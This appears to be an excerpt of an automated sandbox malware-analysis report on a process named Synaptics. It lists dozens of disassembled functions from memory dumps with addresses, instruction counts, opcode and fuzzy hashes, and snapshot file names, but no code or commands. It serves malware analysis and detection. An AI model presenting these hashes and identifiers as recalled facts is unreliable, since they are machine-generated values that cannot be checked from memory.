                                                    • Opcode ID: 67c1837c652159c15dece33d770c9a400034135812bcff8b0a61f8671fd258d4
                                                    • Instruction ID: acde13048171e239b894b84d2cff57c17a9ae0fab2ecc91986019236cb7c680f
                                                    • Opcode Fuzzy Hash: 67c1837c652159c15dece33d770c9a400034135812bcff8b0a61f8671fd258d4
                                                    • Instruction Fuzzy Hash: 80519C75A003069FCB54DF68C58889ABBF2FF89318B1089A9D4499B336DB30FD45CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0606EB58 Relevance: .1, Instructions: 119COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a6017a1c1341f695f416f8fb797c1ee5c5f3c658b8bc052981823994a803bded
                                                    • Instruction ID: bf48294e47f439fd358d0ef2bad9255201f5072fab4264b0458166c0744554f9
                                                    • Opcode Fuzzy Hash: a6017a1c1341f695f416f8fb797c1ee5c5f3c658b8bc052981823994a803bded
                                                    • Instruction Fuzzy Hash: 404106393446048FC754CF2AC58892ABBE6FF89225B1549A9E54A8B772CB30EC81CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 060661D2 Relevance: .1, Instructions: 111COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ebbb6d37721ccd107a5fb9a81acb6dfb4fa5014bc67ab8232313c09dfbad72cc
                                                    • Instruction ID: 34e231e37a0e6d08ffeb437a009ba37e8499eb9cffba8f7e57be4041ad4c1069
                                                    • Opcode Fuzzy Hash: ebbb6d37721ccd107a5fb9a81acb6dfb4fa5014bc67ab8232313c09dfbad72cc
                                                    • Instruction Fuzzy Hash: 69411734B506058FDB48DF69C489B6EBBF5EF48714F1480A9E905CB362CB76E844CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06066098 Relevance: .1, Instructions: 108COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9a307b4ff33dafce1c874c8cdf596449b07c87fe2fb370ff154060c059ea7278
                                                    • Instruction ID: 3e4aa126766c29aeef49158b55dfb3f2fd7b508af021837e3e506c198acdf9d0
                                                    • Opcode Fuzzy Hash: 9a307b4ff33dafce1c874c8cdf596449b07c87fe2fb370ff154060c059ea7278
                                                    • Instruction Fuzzy Hash: 6431E735B1020A9BCB94DFAAC8546AFBBF6EF84204F144839E505DB265EB31FD01CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 060661E0 Relevance: .1, Instructions: 107COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a344bfdcfc5cef8d1f61f3265e4785aa3a2d67cec78659fc1ccd9bc6b62a66d2
                                                    • Instruction ID: 2af7042c65571d320c3d223e373a42358d92dd5053be84c2e5fb69d9470ce5b4
                                                    • Opcode Fuzzy Hash: a344bfdcfc5cef8d1f61f3265e4785aa3a2d67cec78659fc1ccd9bc6b62a66d2
                                                    • Instruction Fuzzy Hash: 9F41F474B106158FDB48DF69C489A6ABFF9FF48704B1580A9E506CB362CB76EC44CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0606F9F0 Relevance: .1, Instructions: 97COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 532f29494140147de2025ae84ab9ceda8caf2015d3def33e2997d4a07f697362
                                                    • Instruction ID: 36982e7032065a3feb15442a49c1f1dc57fd16107a4c3daab30e74d4cbf949fe
                                                    • Opcode Fuzzy Hash: 532f29494140147de2025ae84ab9ceda8caf2015d3def33e2997d4a07f697362
                                                    • Instruction Fuzzy Hash: AF316975B102068FCB98EFB6E8455AEBBF7EF88204B504428E906D7360EF349C01CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0606E467 Relevance: .1, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 978c4f41318bd97f6b07111c5b6b129610df82025c5e5d3e9961ed607239792b
                                                    • Instruction ID: 88ce9a76086b663a59fec49992bbbe81ff72087d2619a61a42e212931a360077
                                                    • Opcode Fuzzy Hash: 978c4f41318bd97f6b07111c5b6b129610df82025c5e5d3e9961ed607239792b
                                                    • Instruction Fuzzy Hash: 7531AC7AA40219CFCB64DF65D5889AABBF1FF88310B148569E9099B721D730FD02CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06066E98 Relevance: .1, Instructions: 82COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9742fa57e16c9850b990be311d3bb598786577102f8d1e1d310d82144878dc87
                                                    • Instruction ID: 083a2458a195e2905fa862905a571a8813f97a70e291f37c06e640b8b9b19efa
                                                    • Opcode Fuzzy Hash: 9742fa57e16c9850b990be311d3bb598786577102f8d1e1d310d82144878dc87
                                                    • Instruction Fuzzy Hash: 062189357601108FC784DF3AD4A892A7BEAAF88A10B1540A9F90ACB371DF31DC41CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 060609C8 Relevance: .1, Instructions: 81COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a809b51842cd564b51103d63e6175d554211428eba9f5d9962eafb16d4eccf19
                                                    • Instruction ID: a72cb1d243446bfcbadb1099c8b8ebf78258aaa52027811bdb2b946a8b5f6b14
                                                    • Opcode Fuzzy Hash: a809b51842cd564b51103d63e6175d554211428eba9f5d9962eafb16d4eccf19
                                                    • Instruction Fuzzy Hash: 57217C347802169FDB549F69D9486BE7BE6FF98340F104468FA03D7380DA399D008BA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0606F9E2 Relevance: .1, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 925e18d15e4d83cf8371443ea3e5d164f2caad5f84d1fdc781a4053342e1f5cd
                                                    • Instruction ID: c3a8680beca1841c72a3a5173440e544aa4ed0c5b3db66bf03f84777a2419e49
                                                    • Opcode Fuzzy Hash: 925e18d15e4d83cf8371443ea3e5d164f2caad5f84d1fdc781a4053342e1f5cd
                                                    • Instruction Fuzzy Hash: 53218075B502069FCB98DF66E9855AEBFF7FF88200B104569E80AD7361DB349C05CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 060609B9 Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: aa6f5320b5c6ff4cc25a033b8eb0cdc6868d12adc69910dcad05d64bcd668567
                                                    • Instruction ID: dd315914db08871a5bf633caea159c6a854ca8755cf1f1edeeedc586712ca186
                                                    • Opcode Fuzzy Hash: aa6f5320b5c6ff4cc25a033b8eb0cdc6868d12adc69910dcad05d64bcd668567
                                                    • Instruction Fuzzy Hash: 7A218E3574021A9FCB549F69D944ABE7FF6FF99240F108469FA03D7380DA359910CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0158D01C Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.391318580.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_158d000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4cd372e10973d38ca5aaaa56a4c252fdeb807e00491d79cb67242dd6c05fdb79
                                                    • Instruction ID: bee549b01cac728a60945a5199fe4ddd3fb0dd8bae2c0d6769c52e2af52a44a1
                                                    • Opcode Fuzzy Hash: 4cd372e10973d38ca5aaaa56a4c252fdeb807e00491d79cb67242dd6c05fdb79
                                                    • Instruction Fuzzy Hash: 60213371504204DFDB10EF94D9C4B2ABBF5FB84354F20C969D8095F286D33AD807CA61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 05B0E608 Relevance: .1, Instructions: 71COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424747177.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_5b00000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 713f9a783833ae49c31a3257501d93b7ec307ac6031bfc19855d2fd2f830b511
                                                    • Instruction ID: b22f3216307e5c38b10103a3dded5aa53c91e2d3fae0104aae47b73f935c2039
                                                    • Opcode Fuzzy Hash: 713f9a783833ae49c31a3257501d93b7ec307ac6031bfc19855d2fd2f830b511
                                                    • Instruction Fuzzy Hash: 661104737082194FE714DA69F8406AAFBE9FBC4230F188577E505C7180DA31E811CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0606E478 Relevance: .1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ebe5aebaa7065937860aff31f6d632175a7a6382b78e69d46d4af6e2fe14d5bc
                                                    • Instruction ID: b7a21bc4bd80226489560a2297f219c81359f4a6f8117c9168923d537235d712
                                                    • Opcode Fuzzy Hash: ebe5aebaa7065937860aff31f6d632175a7a6382b78e69d46d4af6e2fe14d5bc
                                                    • Instruction Fuzzy Hash: D9216979A0021ADFCB14CF65D58496ABFF2FF88310B1085A8E908AB321D730ED41CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06061D8F Relevance: .1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e032d221268afbdeb1d26284722bcfdb67c89cf2be3ff999d98cef894450cb8c
                                                    • Instruction ID: b7e5a056a14bc92fe42e65bac422460e33da06998f6ce1090939d8dae8e1f99a
                                                    • Opcode Fuzzy Hash: e032d221268afbdeb1d26284722bcfdb67c89cf2be3ff999d98cef894450cb8c
                                                    • Instruction Fuzzy Hash: DF11C22210E3E05FCB63977D58B49E73FE98E0316830948EBE0C6CB4B2E614C959C361
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0606F608 Relevance: .1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b01b94f2105d0b0dd117bf2ac8a8c3f95fcab881d67120125b13ff0f12b1fdf1
                                                    • Instruction ID: b4d4a928596643fb701b979bef80609868c11f865fab8dd5dea5446a4e3b44c8
                                                    • Opcode Fuzzy Hash: b01b94f2105d0b0dd117bf2ac8a8c3f95fcab881d67120125b13ff0f12b1fdf1
                                                    • Instruction Fuzzy Hash: 3011C6317852275B8BE4AAAAD9548AFABCBEFD45147008A29F507CB334DF71AC0187D1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0158D006 Relevance: .1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.391318580.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_158d000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0f26582063e05542ec36bc46ddbc3f97a61375dc57ed1098e0466235ef1fdafb
                                                    • Instruction ID: 74ec6e09fda3ca26e89a44488551ae790ddd35806e78d3e5fc923c715e73a796
                                                    • Opcode Fuzzy Hash: 0f26582063e05542ec36bc46ddbc3f97a61375dc57ed1098e0466235ef1fdafb
                                                    • Instruction Fuzzy Hash: 07216D75509380CFDB02CF64D590715BFB1AB46214F28C5EAD8498F697C33A984ACB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06065E40 Relevance: .1, Instructions: 61COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4a41c3be64b8a9f3d38be44d50539d5ecda2ebeb40ca36f0a732fc7368d52cf9
                                                    • Instruction ID: 4ea63edc11feeedbda343880b7fb5741137942beace75a9e91745733ebe890eb
                                                    • Opcode Fuzzy Hash: 4a41c3be64b8a9f3d38be44d50539d5ecda2ebeb40ca36f0a732fc7368d52cf9
                                                    • Instruction Fuzzy Hash: 6F21E4356002159FCB51CF68D884A99BBF6FF99324B248559E41ACB3A2C731ED02CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06066350 Relevance: .1, Instructions: 58COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ae4479bcb9c4ab4bf1f5c60e2f29f5760e224ca9f8cce083f1529563c1928eb5
                                                    • Instruction ID: 20be89005fa46d535c64b7edc61d8f086c829e1c6ad76623c4fd6628a3413210
                                                    • Opcode Fuzzy Hash: ae4479bcb9c4ab4bf1f5c60e2f29f5760e224ca9f8cce083f1529563c1928eb5
                                                    • Instruction Fuzzy Hash: C311CA76B003408FD3608F29C884B0ABBE6EBC9318F54946CE449CB346DA32EC85CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0606F602 Relevance: .1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b672087b20650836d955ee05a48d49b4784709a880c50fda7fa1673360347c93
                                                    • Instruction ID: d77fe9c62e6f6c554e0b4c54d4bee0819e39f4dd0f295b1fcf4f82312fb61cbe
                                                    • Opcode Fuzzy Hash: b672087b20650836d955ee05a48d49b4784709a880c50fda7fa1673360347c93
                                                    • Instruction Fuzzy Hash: B901DB317852279BCBE4AA66D9408AEBFD7EFC45147008929F406CB334DB71AC0187D1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0606E540 Relevance: .1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6e50bce4b6c1b466bc45e5296f7d0bf7fb496a4bd7249d876c5205a16d621fbb
                                                    • Instruction ID: 0f8de8fc030a5d2fae492f6e8a94d82f56586e2221bf5e892d18ce35acf0a979
                                                    • Opcode Fuzzy Hash: 6e50bce4b6c1b466bc45e5296f7d0bf7fb496a4bd7249d876c5205a16d621fbb
                                                    • Instruction Fuzzy Hash: 7311A0766043059FDB61CF65D448A9AFBF6FF89314B008969E449CB721DB71EC41CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0606EAAF Relevance: .1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0b5e7e94fbd3630e033d1e7bd7565c98cbc1e61a77b96d21f18b2e76de9d4ffd
                                                    • Instruction ID: c816b129234d6f3e649be5b9163004f7aa45c9510d91858bc0c0d6285d3d96f9
                                                    • Opcode Fuzzy Hash: 0b5e7e94fbd3630e033d1e7bd7565c98cbc1e61a77b96d21f18b2e76de9d4ffd
                                                    • Instruction Fuzzy Hash: 5D014539B887078FCB8617B5CC5616A7FE59F42104B0845A5E84ACB7C3DE14EC02CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 060663A7 Relevance: .1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8390fca9ba350ef3a9acc255e50b4c4fec8ef986b69b7d589782f52812efabec
                                                    • Instruction ID: c9f6ddaf834bbb1958effcbaed6221f11247251dcc5ec1e5e831337d9b40ddb7
                                                    • Opcode Fuzzy Hash: 8390fca9ba350ef3a9acc255e50b4c4fec8ef986b69b7d589782f52812efabec
                                                    • Instruction Fuzzy Hash: E00180753053109FD3249F35D880A56B7E5EBC9269B14497DF446C7341DF32E806CB10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 060633E1 Relevance: .1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8894a14b11e4f694f9fc69749ab7c81319a61c1b19b089d6af723f320777cbb7
                                                    • Instruction ID: 0bda732af7c352557f1ecb89727d5a8a562071076fd08721aeb9e459c1930a55
                                                    • Opcode Fuzzy Hash: 8894a14b11e4f694f9fc69749ab7c81319a61c1b19b089d6af723f320777cbb7
                                                    • Instruction Fuzzy Hash: 3E11DD74A00206CFD7A4CB2AC644BAAFBE5FF40224F089129E418C7A62E374F945CFC0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0606F95E Relevance: .1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0a97e5b1884b2b12286cc8f021fcc096c8c236d41f302893ca99f851cb24d8e9
                                                    • Instruction ID: d2db1d48879b01a95837110313ec23fa9907d3b5bad79b43411faa7c29bb02a0
                                                    • Opcode Fuzzy Hash: 0a97e5b1884b2b12286cc8f021fcc096c8c236d41f302893ca99f851cb24d8e9
                                                    • Instruction Fuzzy Hash: A001D63A243219BFC66166B8EC17FC73F9EDF59114B450198F0C9972669F2108868AF6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0606E550 Relevance: .1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dbff664bf2652742d0b8addcf41ae2f9c2263833a3d339317edc7237ce63b320
                                                    • Instruction ID: 0c318cce10a31cd170b33f388b42db2c9545e87f59d5304d8991d1e6b6410f67
                                                    • Opcode Fuzzy Hash: dbff664bf2652742d0b8addcf41ae2f9c2263833a3d339317edc7237ce63b320
                                                    • Instruction Fuzzy Hash: 9D11CB356043099FCB64DF69D44899ABBF6FF89324B008929E809CB360DB70EC44CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06064618 Relevance: .0, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 48f1035099a35b5a7aada8000d4aa0e581e8e2ac0ad7dd4d9471964ac8eed96b
                                                    • Instruction ID: f203be0bced896c392ba982d231fcceca7454a69fb2c9e526ef3c25035850c45
                                                    • Opcode Fuzzy Hash: 48f1035099a35b5a7aada8000d4aa0e581e8e2ac0ad7dd4d9471964ac8eed96b
                                                    • Instruction Fuzzy Hash: A8118E396102199F8B44DFA5D8488AFBFF6EB882107008025F509D7214DB30A941CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06065E50 Relevance: .0, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e10ca1742e4b520661ae1a104957ee5d04d4b54691f5abcdd178668839950459
                                                    • Instruction ID: 01cf84af2f44be61fdc9dcde5a522efecdc0e606dd3afe70206eafde108c6149
                                                    • Opcode Fuzzy Hash: e10ca1742e4b520661ae1a104957ee5d04d4b54691f5abcdd178668839950459
                                                    • Instruction Fuzzy Hash: 1711A0356002059FCB04DF68D888D9EBBF6FF89324B208569E809CB361DB31ED02CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 05B0F1D0 Relevance: .0, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424747177.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_5b00000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: efbb6a549f74afac0bc96bfeb5cff46a6e17a1b691e4a51992619e42a5389228
                                                    • Instruction ID: b49abbb9a4b2b868cc5e1f8d106adbf5d7f9c6f95e5ce523074c26e43c43a153
                                                    • Opcode Fuzzy Hash: efbb6a549f74afac0bc96bfeb5cff46a6e17a1b691e4a51992619e42a5389228
                                                    • Instruction Fuzzy Hash: 3A01DE387043008BCB388E36D894437BBA7FBCA22532484BDE4464B795CE71F846CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 05B0F1C0 Relevance: .0, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424747177.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_5b00000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1ae3ee352372a90351d07ef0eacc529458c6def909c32f13b1b966c2ffe314d9
                                                    • Instruction ID: a9a7d317babe705afea6ead3c92841bb115e50b31719e4423ae60cc2df2f74d7
                                                    • Opcode Fuzzy Hash: 1ae3ee352372a90351d07ef0eacc529458c6def909c32f13b1b966c2ffe314d9
                                                    • Instruction Fuzzy Hash: 930141367043008BC7388E3AC894537BBA6FF9A22475844BDE4824B7A1CE31F806CF60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06064608 Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ce16525c92c703b9aa49fd0ebdea140470e3afb5d08a7b7e8ae5d1e1b5de6c9d
                                                    • Instruction ID: daadd0c1db63d498ca102c52cbb3c8d13362733988ec4a34b5b0ed9efaac0ee1
                                                    • Opcode Fuzzy Hash: ce16525c92c703b9aa49fd0ebdea140470e3afb5d08a7b7e8ae5d1e1b5de6c9d
                                                    • Instruction Fuzzy Hash: 6801AD3AA1021A9FCF44DFB5D8499AFBFF5EB88220B04853AF509D3254DB309952CF90
                                                    Uniqueness

